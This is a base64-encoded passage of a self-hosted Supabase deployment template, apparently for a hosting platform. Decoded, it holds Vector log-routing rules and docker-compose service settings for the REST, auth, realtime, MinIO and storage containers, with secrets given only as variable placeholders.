CAgICAgLm1ldGFkYXRhLnJlcXVlc3QucGF0aCA9IHVybFsxXVxuICAgICAgICAgICAgICAubWV0YWRhdGEucmVxdWVzdC5wcm90b2NvbCA9IHVybFsyXVxuICAgICAgICAgIH1cbiAgICAgIH1cbiAgICAgIGlmIGVyciAhPSBudWxsIHtcbiAgICAgICAgYWJvcnRcbiAgICAgIH1cbiAgIyBHb3RydWUgbG9ncyBhcmUgc3RydWN0dXJlZCBqc29uIHN0cmluZ3Mgd2hpY2ggZnJvbnRlbmQgcGFyc2VzIGRpcmVjdGx5LiBCdXQgd2Uga2VlcCBtZXRhZGF0YSBmb3IgY29uc2lzdGVuY3kuXG4gIGF1dGhfbG9nczpcbiAgICB0eXBlOiByZW1hcFxuICAgIGlucHV0czpcbiAgICAgIC0gcm91dGVyLmF1dGhcbiAgICBzb3VyY2U6IHwtXG4gICAgICBwYXJzZWQsIGVyciA9IHBhcnNlX2pzb24oLmV2ZW50X21lc3NhZ2UpXG4gICAgICBpZiBlcnIgPT0gbnVsbCB7XG4gICAgICAgICAgLm1ldGFkYXRhLnRpbWVzdGFtcCA9IHBhcnNlZC50aW1lXG4gICAgICAgICAgLm1ldGFkYXRhID0gbWVyZ2UhKC5tZXRhZGF0YSwgcGFyc2VkKVxuICAgICAgfVxuICAjIFBvc3RnUkVTVCBsb2dzIGFyZSBzdHJ1Y3R1cmVkIHNvIHdlIHNlcGFyYXRlIHRpbWVzdGFtcCBmcm9tIG1lc3NhZ2UgdXNpbmcgcmVnZXhcbiAgcmVzdF9sb2dzOlxuICAgIHR5cGU6IHJlbWFwXG4gICAgaW5wdXRzOlxuICAgICAgLSByb3V0ZXIucmVzdFxuICAgIHNvdXJjZTogfC1cbiAgICAgIHBhcnNlZCwgZXJyID0gcGFyc2VfcmVnZXgoLmV2ZW50X21lc3NhZ2UsIHInXig/UDx0aW1lPi4qKTogKD9QPG1zZz4uKikkJylcbiAgICAgIGlmIGVyciA9PSBudWxsIHtcbiAgICAgICAgICAuZXZlbnRfbWVzc2FnZSA9IHBhcnNlZC5tc2dcbiAgICAgICAgICAudGltZXN0YW1wID0gdG9fdGltZXN0YW1wIShwYXJzZWQudGltZSlcbiAgICAgICAgICAubWV0YWRhdGEuaG9zdCA9IC5wcm9qZWN0XG4gICAgICB9XG4gICMgUmVhbHRpbWUgbG9ncyBhcmUgc3RydWN0dXJlZCBzbyB3ZSBwYXJzZSB0aGUgc2V2ZXJpdHkgbGV2ZWwgdXNpbmcgcmVnZXggKGlnbm9yZSB0aW1lIGJlY2F1c2UgaXQgaGFzIG5vIGRhdGUpXG4gIHJlYWx0aW1lX2xvZ3M6XG4gICAgdHlwZTogcmVtYXBcbiAgICBpbnB1dHM6XG4gICAgICAtIHJvdXRlci5yZWFsdGltZVxuICAgIHNvdXJjZTogfC1cbiAgICAgIC5tZXRhZGF0YS5wcm9qZWN0ID0gZGVsKC5wcm9qZWN0KVxuICAgICAgLm1ldGFkYXRhLmV4dGVybmFsX2lkID0gLm1ldGFkYXRhLnByb2plY3RcbiAgICAgIHBhcnNlZCwgZXJyID0gcGFyc2VfcmVnZXgoLmV2ZW50X21lc3NhZ2UsIHInXig/UDx0aW1lPlxcZCs6XFxkKzpcXGQrXFwuXFxkKykgXFxbKD9QPGxldmVsPlxcdyspXFxdICg/UDxtc2c+LiopJCcpXG4gICAgICBpZiBlcnIgPT0gbnVsbCB7XG4gICAgICAgICAgLmV2ZW50X21lc3NhZ2UgPSBwYXJzZWQubXNnXG4gICAgICAgICAgLm1ldGFkYXRhLmxldmVsID0gcGFyc2VkLmxldmVsXG4gICAgICB9XG4gICMgU3RvcmFnZSBsb2dzIG1heSBjb250YWluIGpzb24gb2JqZWN0cyBzbyB3ZSBwYXJzZSB0aGVtIGZvciBjb21wbGV0ZW5lc3NcbiAgc3RvcmFnZV9sb2dzOlxuICAgIHR5cGU6IHJlbWFwXG4gICAgaW5wdXRzOlxuICAgICAgLSByb3V0ZXIuc3RvcmFnZVxuICAgIHNvdXJjZTogfC1cbiAgICAgIC5tZXRhZGF0YS5wcm9qZWN0ID0gZGVsKC5wcm9qZWN0KVxuICAgICAgLm1ldGFkYXRhLnRlbmFudElkID0gLm1ldGFkYXRhLnByb2plY3RcbiAgICAgIHBhcnNlZCwgZXJyID0gcGFyc2VfanNvbiguZXZlbnRfbWVzc2FnZSlcbiAgICAgIGlmIGVyciA9PSBudWxsIHtcbiAgICAgICAgICAuZXZlbnRfbWVzc2FnZSA9IHBhcnNlZC5tc2dcbiAgICAgICAgICAubWV0YWRhdGEubGV2ZWwgPSBwYXJzZWQubGV2ZWxcbiAgICAgICAgICAubWV0YWRhdGEudGltZXN0YW1wID0gcGFyc2VkLnRpbWVcbiAgICAgICAgICAubWV0YWRhdGEuY29udGV4dFswXS5ob3N0ID0gcGFyc2VkLmhvc3RuYW1lXG4gICAgICAgICAgLm1ldGFkYXRhLmNvbnRleHRbMF0ucGlkID0gcGFyc2VkLnBpZFxuICAgICAgfVxuICAjIFBvc3RncmVzIGxvZ3Mgc29tZSBtZXNzYWdlcyB0byBzdGRlcnIgd2hpY2ggd2UgbWFwIHRvIHdhcm5pbmcgc2V2ZXJpdHkgbGV2ZWxcbiAgZGJfbG9nczpcbiAgICB0eXBlOiByZW1hcFxuICAgIGlucHV0czpcbiAgICAgIC0gcm91dGVyLmRiXG4gICAgc291cmNlOiB8LVxuICAgICAgLm1ldGFkYXRhLmhvc3QgPSBcImRiLWRlZmF1bHRcIlxuICAgICAgLm1ldGFkYXRhLnBhcnNlZC50aW1lc3RhbXAgPSAudGltZXN0YW1wXG5cbiAgICAgIHBhcnNlZCwgZXJyID0gcGFyc2VfcmVnZXgoLmV2ZW50X21lc3NhZ2UsIHInLiooP1A8bGV2ZWw+SU5GT3xOT1RJQ0V8V0FSTklOR3xFUlJPUnxMT0d8RkFUQUx8UEFOSUM/KTouKicsIG51bWVyaWNfZ3JvdXBzOiB0cnVlKVxuXG4gICAgICBpZiBlcnIgIT0gbnVsbCB8fCBwYXJzZWQgPT0gbnVsbCB7XG4gICAgICAgIC5tZXRhZGF0YS5wYXJzZWQuZXJyb3Jfc2V2ZXJpdHkgPSBcImluZm9cIlxuICAgICAgfVxuICAgICAgaWYgcGFyc2VkICE9IG51bGwge1xuICAgICAgLm1ldGFkYXRhLnBhcnNlZC5lcnJvcl9zZXZlcml0eSA9IHBhcnNlZC5sZXZlbFxuICAgICAgfVxuICAgICAgaWYgLm1ldGFkYXRhLnBhcnNlZC5lcnJvcl9zZXZlcml0eSA9PSBcImluZm9cIiB7XG4gICAgICAgICAgLm1ldGFkYXRhLnBhcnNlZC5lcnJvcl9zZXZlcml0eSA9IFwibG9nXCJcbiAgICAgIH1cbiAgICAgIC5tZXRhZGF0YS5wYXJzZWQuZXJyb3Jfc2V2ZXJpdHkgPSB1cGNhc2UhKC5tZXRhZGF0YS5wYXJzZWQuZXJyb3Jfc2V2ZXJpdHkpXG5cbnNpbmtzOlxuICBsb2dmbGFyZV9hdXRoOlxuICAgIHR5cGU6ICdodHRwJ1xuICAgIGlucHV0czpcbiAgICAgIC0gYXV0aF9sb2dzXG4gICAgZW5jb2Rpbmc6XG4gICAgICBjb2RlYzogJ2pzb24nXG4gICAgbWV0aG9kOiAncG9zdCdcbiAgICByZXF1ZXN0OlxuICAgICAgcmV0cnlfbWF4X2R1cmF0aW9uX3NlY3M6IDEwXG4gICAgdXJpOiAnaHR0cDovL3N1cGFiYXNlLWFuYWx5dGljczo0MDAwL2FwaS9sb2dzP3NvdXJjZV9uYW1lPWdvdHJ1ZS5sb2dzLnByb2QmYXBpX2tleT0ke0xPR0ZMQVJFX0FQSV9LRVk/TE9HRkxBUkVfQVBJX0tFWSBpcyByZXF1aXJlZH0nXG4gIGxvZ2ZsYXJlX3JlYWx0aW1lOlxuICAgIHR5cGU6ICdodHRwJ1xuICAgIGlucHV0czpcbiAgICAgIC0gcmVhbHRpbWVfbG9nc1xuICAgIGVuY29kaW5nOlxuICAgICAgY29kZWM6ICdqc29uJ1xuICAgIG1ldGhvZDogJ3Bvc3QnXG4gICAgcmVxdWVzdDpcbiAgICAgIHJldHJ5X21heF9kdXJhdGlvbl9zZWNzOiAxMFxuICAgIHVyaTogJ2h0dHA6Ly9zdXBhYmFzZS1hbmFseXRpY3M6NDAwMC9hcGkvbG9ncz9zb3VyY2VfbmFtZT1yZWFsdGltZS5sb2dzLnByb2QmYXBpX2tleT0ke0xPR0ZMQVJFX0FQSV9LRVk/TE9HRkxBUkVfQVBJX0tFWSBpcyByZXF1aXJlZH0nXG4gIGxvZ2ZsYXJlX3Jlc3Q6XG4gICAgdHlwZTogJ2h0dHAnXG4gICAgaW5wdXRzOlxuICAgICAgLSByZXN0X2xvZ3NcbiAgICBlbmNvZGluZzpcbiAgICAgIGNvZGVjOiAnanNvbidcbiAgICBtZXRob2Q6ICdwb3N0J1xuICAgIHJlcXVlc3Q6XG4gICAgICByZXRyeV9tYXhfZHVyYXRpb25fc2VjczogMTBcbiAgICB1cmk6ICdodHRwOi8vc3VwYWJhc2UtYW5hbHl0aWNzOjQwMDAvYXBpL2xvZ3M/c291cmNlX25hbWU9cG9zdGdSRVNULmxvZ3MucHJvZCZhcGlfa2V5PSR7TE9HRkxBUkVfQVBJX0tFWT9MT0dGTEFSRV9BUElfS0VZIGlzIHJlcXVpcmVkfSdcbiAgbG9nZmxhcmVfZGI6XG4gICAgdHlwZTogJ2h0dHAnXG4gICAgaW5wdXRzOlxuICAgICAgLSBkYl9sb2dzXG4gICAgZW5jb2Rpbmc6XG4gICAgICBjb2RlYzogJ2pzb24nXG4gICAgbWV0aG9kOiAncG9zdCdcbiAgICByZXF1ZXN0OlxuICAgICAgcmV0cnlfbWF4X2R1cmF0aW9uX3NlY3M6IDEwXG4gICAgIyBXZSBtdXN0IHJvdXRlIHRoZSBzaW5rIHRocm91Z2gga29uZyBiZWNhdXNlIGluZ2VzdGluZyBsb2dzIGJlZm9yZSBsb2dmbGFyZSBpcyBmdWxseSBpbml0aWFsaXNlZCB3aWxsXG4gICAgIyBsZWFkIHRvIGJyb2tlbiBxdWVyaWVzIGZyb20gc3R1ZGlvLiBUaGlzIHdvcmtzIGJ5IHRoZSBhc3N1bXB0aW9uIHRoYXQgY29udGFpbmVycyBhcmUgc3RhcnRlZCBpbiB0aGVcbiAgICAjIGZvbGxvd2luZyBvcmRlcjogdmVjdG9yID4gZGIgPiBsb2dmbGFyZSA+IGtvbmdcbiAgICB1cmk6ICdodHRwOi8vc3VwYWJhc2Uta29uZzo4MDAwL2FuYWx5dGljcy92MS9hcGkvbG9ncz9zb3VyY2VfbmFtZT1wb3N0Z3Jlcy5sb2dzJmFwaV9rZXk9JHtMT0dGTEFSRV9BUElfS0VZP0xPR0ZMQVJFX0FQSV9LRVkgaXMgcmVxdWlyZWR9J1xuICBsb2dmbGFyZV9mdW5jdGlvbnM6XG4gICAgdHlwZTogJ2h0dHAnXG4gICAgaW5wdXRzOlxuICAgICAgLSByb3V0ZXIuZnVuY3Rpb25zXG4gICAgZW5jb2Rpbmc6XG4gICAgICBjb2RlYzogJ2pzb24nXG4gICAgbWV0aG9kOiAncG9zdCdcbiAgICByZXF1ZXN0OlxuICAgICAgcmV0cnlfbWF4X2R1cmF0aW9uX3NlY3M6IDEwXG4gICAgdXJpOiAnaHR0cDovL3N1cGFiYXNlLWFuYWx5dGljczo0MDAwL2FwaS9sb2dzP3NvdXJjZV9uYW1lPWRlbm8tcmVsYXktbG9ncyZhcGlfa2V5PSR7TE9HRkxBUkVfQVBJX0tFWT9MT0dGTEFSRV9BUElfS0VZIGlzIHJlcXVpcmVkfSdcbiAgbG9nZmxhcmVfc3RvcmFnZTpcbiAgICB0eXBlOiAnaHR0cCdcbiAgICBpbnB1dHM6XG4gICAgICAtIHN0b3JhZ2VfbG9nc1xuICAgIGVuY29kaW5nOlxuICAgICAgY29kZWM6ICdqc29uJ1xuICAgIG1ldGhvZDogJ3Bvc3QnXG4gICAgcmVxdWVzdDpcbiAgICAgIHJldHJ5X21heF9kdXJhdGlvbl9zZWNzOiAxMFxuICAgIHVyaTogJ2h0dHA6Ly9zdXBhYmFzZS1hbmFseXRpY3M6NDAwMC9hcGkvbG9ncz9zb3VyY2VfbmFtZT1zdG9yYWdlLmxvZ3MucHJvZC4yJmFwaV9rZXk9JHtMT0dGTEFSRV9BUElfS0VZP0xPR0ZMQVJFX0FQSV9LRVkgaXMgcmVxdWlyZWR9J1xuICBsb2dmbGFyZV9rb25nOlxuICAgIHR5cGU6ICdodHRwJ1xuICAgIGlucHV0czpcbiAgICAgIC0ga29uZ19sb2dzXG4gICAgICAtIGtvbmdfZXJyXG4gICAgZW5jb2Rpbmc6XG4gICAgICBjb2RlYzogJ2pzb24nXG4gICAgbWV0aG9kOiAncG9zdCdcbiAgICByZXF1ZXN0OlxuICAgICAgcmV0cnlfbWF4X2R1cmF0aW9uX3NlY3M6IDEwXG4gICAgdXJpOiAnaHR0cDovL3N1cGFiYXNlLWFuYWx5dGljczo0MDAwL2FwaS9sb2dzP3NvdXJjZV9uYW1lPWNsb3VkZmxhcmUubG9ncy5wcm9kJmFwaV9rZXk9JHtMT0dGTEFSRV9BUElfS0VZP0xPR0ZMQVJFX0FQSV9LRVkgaXMgcmVxdWlyZWR9J1xuIgogICAgICAtICcvdmFyL3J1bi9kb2NrZXIuc29jazovdmFyL3J1bi9kb2NrZXIuc29jazpybycKICAgIGVudmlyb25tZW50OgogICAgICAtICdMT0dGTEFSRV9BUElfS0VZPSR7U0VSVklDRV9QQVNTV09SRF9MT0dGTEFSRX0nCiAgICBjb21tYW5kOgogICAgICAtICctLWNvbmZpZycKICAgICAgLSBldGMvdmVjdG9yL3ZlY3Rvci55bWwKICBzdXBhYmFzZS1yZXN0OgogICAgaW1hZ2U6ICdwb3N0Z3Jlc3QvcG9zdGdyZXN0OnYxMi4yLjEyJwogICAgZGVwZW5kc19vbjoKICAgICAgc3VwYWJhc2UtZGI6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgICAgc3VwYWJhc2UtYW5hbHl0aWNzOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICBlbnZpcm9ubWVudDoKICAgICAgLSAnUEdSU1RfREJfVVJJPXBvc3RncmVzOi8vYXV0aGVudGljYXRvcjoke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVN9QCR7UE9TVEdSRVNfSE9TVE5BTUU6LXN1cGFiYXNlLWRifToke1BPU1RHUkVTX1BPUlQ6LTU0MzJ9LyR7UE9TVEdSRVNfREI6LXBvc3RncmVzfScKICAgICAgLSAnUEdSU1RfREJfU0NIRU1BUz0ke1BHUlNUX0RCX1NDSEVNQVM6LXB1YmxpYyxzdG9yYWdlLGdyYXBocWxfcHVibGljfScKICAgICAgLSBQR1JTVF9EQl9BTk9OX1JPTEU9YW5vbgogICAgICAtICdQR1JTVF9KV1RfU0VDUkVUPSR7U0VSVklDRV9QQVNTV09SRF9KV1R9JwogICAgICAtIFBHUlNUX0RCX1VTRV9MRUdBQ1lfR1VDUz1mYWxzZQogICAgICAtICdQR1JTVF9BUFBfU0VUVElOR1NfSldUX1NFQ1JFVD0ke1NFUlZJQ0VfUEFTU1dPUkRfSldUfScKICAgICAgLSAnUEdSU1RfQVBQX1NFVFRJTkdTX0pXVF9FWFA9JHtKV1RfRVhQSVJZOi0zNjAwfScKICAgIGNvbW1hbmQ6IHBvc3RncmVzdAogICAgZXhjbHVkZV9mcm9tX2hjOiB0cnVlCiAgc3VwYWJhc2UtYXV0aDoKICAgIGltYWdlOiAnc3VwYWJhc2UvZ290cnVlOnYyLjE3NC4wJwogICAgZGVwZW5kc19vbjoKICAgICAgc3VwYWJhc2UtZGI6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgICAgc3VwYWJhc2UtYW5hbHl0aWNzOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gd2dldAogICAgICAgIC0gJy0tbm8tdmVyYm9zZScKICAgICAgICAtICctLXRyaWVzPTEnCiAgICAgICAgLSAnLS1zcGlkZXInCiAgICAgICAgLSAnaHR0cDovLzEyNy4wLjAuMTo5OTk5L2hlYWx0aCcKICAgICAgdGltZW91dDogNXMKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHJldHJpZXM6IDMKICAgIGVudmlyb25tZW50OgogICAgICAtIEdPVFJVRV9BUElfSE9TVD0wLjAuMC4wCiAgICAgIC0gR09UUlVFX0FQSV9QT1JUPTk5OTkKICAgICAgLSAnQVBJX0VYVEVSTkFMX1VSTD0ke0FQSV9FWFRFUk5BTF9VUkw6LWh0dHA6Ly9zdXBhYmFzZS1rb25nOjgwMDB9JwogICAgICAtIEdPVFJVRV9EQl9EUklWRVI9cG9zdGdyZXMKICAgICAgLSAnR09UUlVFX0RCX0RBVEFCQVNFX1VSTD1wb3N0Z3JlczovL3N1cGFiYXNlX2F1dGhfYWRtaW46JHtTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTfUAke1BPU1RHUkVTX0hPU1ROQU1FOi1zdXBhYmFzZS1kYn06JHtQT1NUR1JFU19QT1JUOi01NDMyfS8ke1BPU1RHUkVTX0RCOi1wb3N0Z3Jlc30nCiAgICAgIC0gJ0dPVFJVRV9TSVRFX1VSTD0ke1NFUlZJQ0VfRlFETl9TVVBBQkFTRUtPTkd9JwogICAgICAtICdHT1RSVUVfVVJJX0FMTE9XX0xJU1Q9JHtBRERJVElPTkFMX1JFRElSRUNUX1VSTFN9JwogICAgICAtICdHT1RSVUVfRElTQUJMRV9TSUdOVVA9JHtESVNBQkxFX1NJR05VUDotZmFsc2V9JwogICAgICAtIEdPVFJVRV9KV1RfQURNSU5fUk9MRVM9c2VydmljZV9yb2xlCiAgICAgIC0gR09UUlVFX0pXVF9BVUQ9YXV0aGVudGljYXRlZAogICAgICAtIEdPVFJVRV9KV1RfREVGQVVMVF9HUk9VUF9OQU1FPWF1dGhlbnRpY2F0ZWQKICAgICAgLSAnR09UUlVFX0pXVF9FWFA9JHtKV1RfRVhQSVJZOi0zNjAwfScKICAgICAgLSAnR09UUlVFX0pXVF9TRUNSRVQ9JHtTRVJWSUNFX1BBU1NXT1JEX0pXVH0nCiAgICAgIC0gJ0dPVFJVRV9FWFRFUk5BTF9FTUFJTF9FTkFCTEVEPSR7RU5BQkxFX0VNQUlMX1NJR05VUDotdHJ1ZX0nCiAgICAgIC0gJ0dPVFJVRV9FWFRFUk5BTF9BTk9OWU1PVVNfVVNFUlNfRU5BQkxFRD0ke0VOQUJMRV9BTk9OWU1PVVNfVVNFUlM6LWZhbHNlfScKICAgICAgLSAnR09UUlVFX01BSUxFUl9BVVRPQ09ORklSTT0ke0VOQUJMRV9FTUFJTF9BVVRPQ09ORklSTTotZmFsc2V9JwogICAgICAtICdHT1RSVUVfU01UUF9BRE1JTl9FTUFJTD0ke1NNVFBfQURNSU5fRU1BSUx9JwogICAgICAtICdHT1RSVUVfU01UUF9IT1NUPSR7U01UUF9IT1NUfScKICAgICAgLSAnR09UUlVFX1NNVFBfUE9SVD0ke1NNVFBfUE9SVDotNTg3fScKICAgICAgLSAnR09UUlVFX1NNVFBfVVNFUj0ke1NNVFBfVVNFUn0nCiAgICAgIC0gJ0dPVFJVRV9TTVRQX1BBU1M9JHtTTVRQX1BBU1N9JwogICAgICAtICdHT1RSVUVfU01UUF9TRU5ERVJfTkFNRT0ke1NNVFBfU0VOREVSX05BTUV9JwogICAgICAtICdHT1RSVUVfTUFJTEVSX1VSTFBBVEhTX0lOVklURT0ke01BSUxFUl9VUkxQQVRIU19JTlZJVEU6LS9hdXRoL3YxL3ZlcmlmeX0nCiAgICAgIC0gJ0dPVFJVRV9NQUlMRVJfVVJMUEFUSFNfQ09ORklSTUFUSU9OPSR7TUFJTEVSX1VSTFBBVEhTX0NPTkZJUk1BVElPTjotL2F1dGgvdjEvdmVyaWZ5fScKICAgICAgLSAnR09UUlVFX01BSUxFUl9VUkxQQVRIU19SRUNPVkVSWT0ke01BSUxFUl9VUkxQQVRIU19SRUNPVkVSWTotL2F1dGgvdjEvdmVyaWZ5fScKICAgICAgLSAnR09UUlVFX01BSUxFUl9VUkxQQVRIU19FTUFJTF9DSEFOR0U9JHtNQUlMRVJfVVJMUEFUSFNfRU1BSUxfQ0hBTkdFOi0vYXV0aC92MS92ZXJpZnl9JwogICAgICAtICdHT1RSVUVfTUFJTEVSX1RFTVBMQVRFU19JTlZJVEU9JHtNQUlMRVJfVEVNUExBVEVTX0lOVklURX0nCiAgICAgIC0gJ0dPVFJVRV9NQUlMRVJfVEVNUExBVEVTX0NPTkZJUk1BVElPTj0ke01BSUxFUl9URU1QTEFURVNfQ09ORklSTUFUSU9OfScKICAgICAgLSAnR09UUlVFX01BSUxFUl9URU1QTEFURVNfUkVDT1ZFUlk9JHtNQUlMRVJfVEVNUExBVEVTX1JFQ09WRVJZfScKICAgICAgLSAnR09UUlVFX01BSUxFUl9URU1QTEFURVNfTUFHSUNfTElOSz0ke01BSUxFUl9URU1QTEFURVNfTUFHSUNfTElOS30nCiAgICAgIC0gJ0dPVFJVRV9NQUlMRVJfVEVNUExBVEVTX0VNQUlMX0NIQU5HRT0ke01BSUxFUl9URU1QTEFURVNfRU1BSUxfQ0hBTkdFfScKICAgICAgLSAnR09UUlVFX01BSUxFUl9TVUJKRUNUU19DT05GSVJNQVRJT049JHtNQUlMRVJfU1VCSkVDVFNfQ09ORklSTUFUSU9OfScKICAgICAgLSAnR09UUlVFX01BSUxFUl9TVUJKRUNUU19SRUNPVkVSWT0ke01BSUxFUl9TVUJKRUNUU19SRUNPVkVSWX0nCiAgICAgIC0gJ0dPVFJVRV9NQUlMRVJfU1VCSkVDVFNfTUFHSUNfTElOSz0ke01BSUxFUl9TVUJKRUNUU19NQUdJQ19MSU5LfScKICAgICAgLSAnR09UUlVFX01BSUxFUl9TVUJKRUNUU19FTUFJTF9DSEFOR0U9JHtNQUlMRVJfU1VCSkVDVFNfRU1BSUxfQ0hBTkdFfScKICAgICAgLSAnR09UUlVFX01BSUxFUl9TVUJKRUNUU19JTlZJVEU9JHtNQUlMRVJfU1VCSkVDVFNfSU5WSVRFfScKICAgICAgLSAnR09UUlVFX0VYVEVSTkFMX1BIT05FX0VOQUJMRUQ9JHtFTkFCTEVfUEhPTkVfU0lHTlVQOi10cnVlfScKICAgICAgLSAnR09UUlVFX1NNU19BVVRPQ09ORklSTT0ke0VOQUJMRV9QSE9ORV9BVVRPQ09ORklSTTotdHJ1ZX0nCiAgcmVhbHRpbWUtZGV2OgogICAgaW1hZ2U6ICdzdXBhYmFzZS9yZWFsdGltZTp2Mi4zNC40NycKICAgIGNvbnRhaW5lcl9uYW1lOiByZWFsdGltZS1kZXYuc3VwYWJhc2UtcmVhbHRpbWUKICAgIGRlcGVuZHNfb246CiAgICAgIHN1cGFiYXNlLWRiOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICAgIHN1cGFiYXNlLWFuYWx5dGljczoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIGN1cmwKICAgICAgICAtICctc1NmTCcKICAgICAgICAtICctLWhlYWQnCiAgICAgICAgLSAnLW8nCiAgICAgICAgLSAvZGV2L251bGwKICAgICAgICAtICctSCcKICAgICAgICAtICdBdXRob3JpemF0aW9uOiBCZWFyZXIgJHtTRVJWSUNFX1NVUEFCQVNFQU5PTl9LRVl9JwogICAgICAgIC0gJ2h0dHA6Ly8xMjcuMC4wLjE6NDAwMC9hcGkvdGVuYW50cy9yZWFsdGltZS1kZXYvaGVhbHRoJwogICAgICB0aW1lb3V0OiA1cwogICAgICBpbnRlcnZhbDogNXMKICAgICAgcmV0cmllczogMwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gUE9SVD00MDAwCiAgICAgIC0gJ0RCX0hPU1Q9JHtQT1NUR1JFU19IT1NUTkFNRTotc3VwYWJhc2UtZGJ9JwogICAgICAtICdEQl9QT1JUPSR7UE9TVEdSRVNfUE9SVDotNTQzMn0nCiAgICAgIC0gREJfVVNFUj1zdXBhYmFzZV9hZG1pbgogICAgICAtICdEQl9QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVN9JwogICAgICAtICdEQl9OQU1FPSR7UE9TVEdSRVNfREI6LXBvc3RncmVzfScKICAgICAgLSAnREJfQUZURVJfQ09OTkVDVF9RVUVSWT1TRVQgc2VhcmNoX3BhdGggVE8gX3JlYWx0aW1lJwogICAgICAtIERCX0VOQ19LRVk9c3VwYWJhc2VyZWFsdGltZQogICAgICAtICdBUElfSldUX1NFQ1JFVD0ke1NFUlZJQ0VfUEFTU1dPUkRfSldUfScKICAgICAgLSBGTFlfQUxMT0NfSUQ9Zmx5MTIzCiAgICAgIC0gRkxZX0FQUF9OQU1FPXJlYWx0aW1lCiAgICAgIC0gJ1NFQ1JFVF9LRVlfQkFTRT0ke1NFQ1JFVF9QQVNTV09SRF9SRUFMVElNRX0nCiAgICAgIC0gJ0VSTF9BRkxBR1M9LXByb3RvX2Rpc3QgaW5ldF90Y3AnCiAgICAgIC0gRU5BQkxFX1RBSUxTQ0FMRT1mYWxzZQogICAgICAtICJETlNfTk9ERVM9JyciCiAgICAgIC0gUkxJTUlUX05PRklMRT0xMDAwMAogICAgICAtIEFQUF9OQU1FPXJlYWx0aW1lCiAgICAgIC0gU0VFRF9TRUxGX0hPU1Q9dHJ1ZQogICAgICAtIExPR19MRVZFTD1lcnJvcgogICAgICAtIFJVTl9KQU5JVE9SPXRydWUKICAgICAgLSBKQU5JVE9SX0lOVEVSVkFMPTYwMDAwCiAgICBjb21tYW5kOiAic2ggLWMgXCIvYXBwL2Jpbi9taWdyYXRlICYmIC9hcHAvYmluL3JlYWx0aW1lIGV2YWwgJ1JlYWx0aW1lLlJlbGVhc2Uuc2VlZHMoUmVhbHRpbWUuUmVwbyknICYmIC9hcHAvYmluL3NlcnZlclwiXG4iCiAgc3VwYWJhc2UtbWluaW86CiAgICBpbWFnZTogJ2doY3IuaW8vY29vbGxhYnNpby9taW5pbzpSRUxFQVNFLjIwMjUtMTAtMTVUMTctMjktNTVaJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gJ01JTklPX1JPT1RfVVNFUj0ke1NFUlZJQ0VfVVNFUl9NSU5JT30nCiAgICAgIC0gJ01JTklPX1JPT1RfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX01JTklPfScKICAgIGNvbW1hbmQ6ICdzZXJ2ZXIgLS1jb25zb2xlLWFkZHJlc3MgIjo5MDAxIiAvZGF0YScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSBtYwogICAgICAgIC0gcmVhZHkKICAgICAgICAtIGxvY2FsCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiAyMHMKICAgICAgcmV0cmllczogMTAKICAgIHZvbHVtZXM6CiAgICAgIC0gJy4vdm9sdW1lcy9zdG9yYWdlOi9kYXRhJwogIG1pbmlvLWNyZWF0ZWJ1Y2tldDoKICAgIGltYWdlOiBtaW5pby9tYwogICAgcmVzdGFydDogJ25vJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gJ01JTklPX1JPT1RfVVNFUj0ke1NFUlZJQ0VfVVNFUl9NSU5JT30nCiAgICAgIC0gJ01JTklPX1JPT1RfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX01JTklPfScKICAgIGRlcGVuZHNfb246CiAgICAgIHN1cGFiYXNlLW1pbmlvOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICBlbnRyeXBvaW50OgogICAgICAtIC9lbnRyeXBvaW50LnNoCiAgICB2b2x1bWVzOgogICAgICAtCiAgICAgICAgdHlwZTogYmluZAogICAgICAgIHNvdXJjZTogLi9lbnRyeXBvaW50LnNoCiAgICAgICAgdGFyZ2V0OiAvZW50cnlwb2ludC5zaAogICAgICAgIGNvbnRlbnQ6ICIjIS9iaW4vc2hcbi91c3IvYmluL21jIGFsaWFzIHNldCBzdXBhYmFzZS1taW5pbyBodHRwOi8vc3VwYWJhc2UtbWluaW86OTAwMCAke01JTklPX1JPT1RfVVNFUn0gJHtNSU5JT19ST09UX1BBU1NXT1JEfTtcbi91c3IvYmluL21jIG1iIC0taWdub3JlLWV4aXN0aW5nIHN1cGFiYXNlLW1pbmlvL3N0dWI7XG5leGl0IDBcbiIKICBzdXBhYmFzZS1zdG9yYWdlOgogICAgaW1hZ2U6ICdzdXBhYmFzZS9zdG9yYWdlLWFwaTp2MS4xNC42JwogICAgZGVwZW5kc19vbjoKICAgICAgc3VwYWJhc2UtZGI6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgICAgc3VwYWJhc2UtcmVzdDoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2Vfc3RhcnRlZAogICAgICBpbWdwcm94eToKICAgICAgICBjb25kaXRpb246IHNlcnZpY2Vfc3RhcnRlZAogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIHdnZXQKICAgICAgICAtICctLW5vLXZlcmJvc2UnCiAgICAgICAgLSAn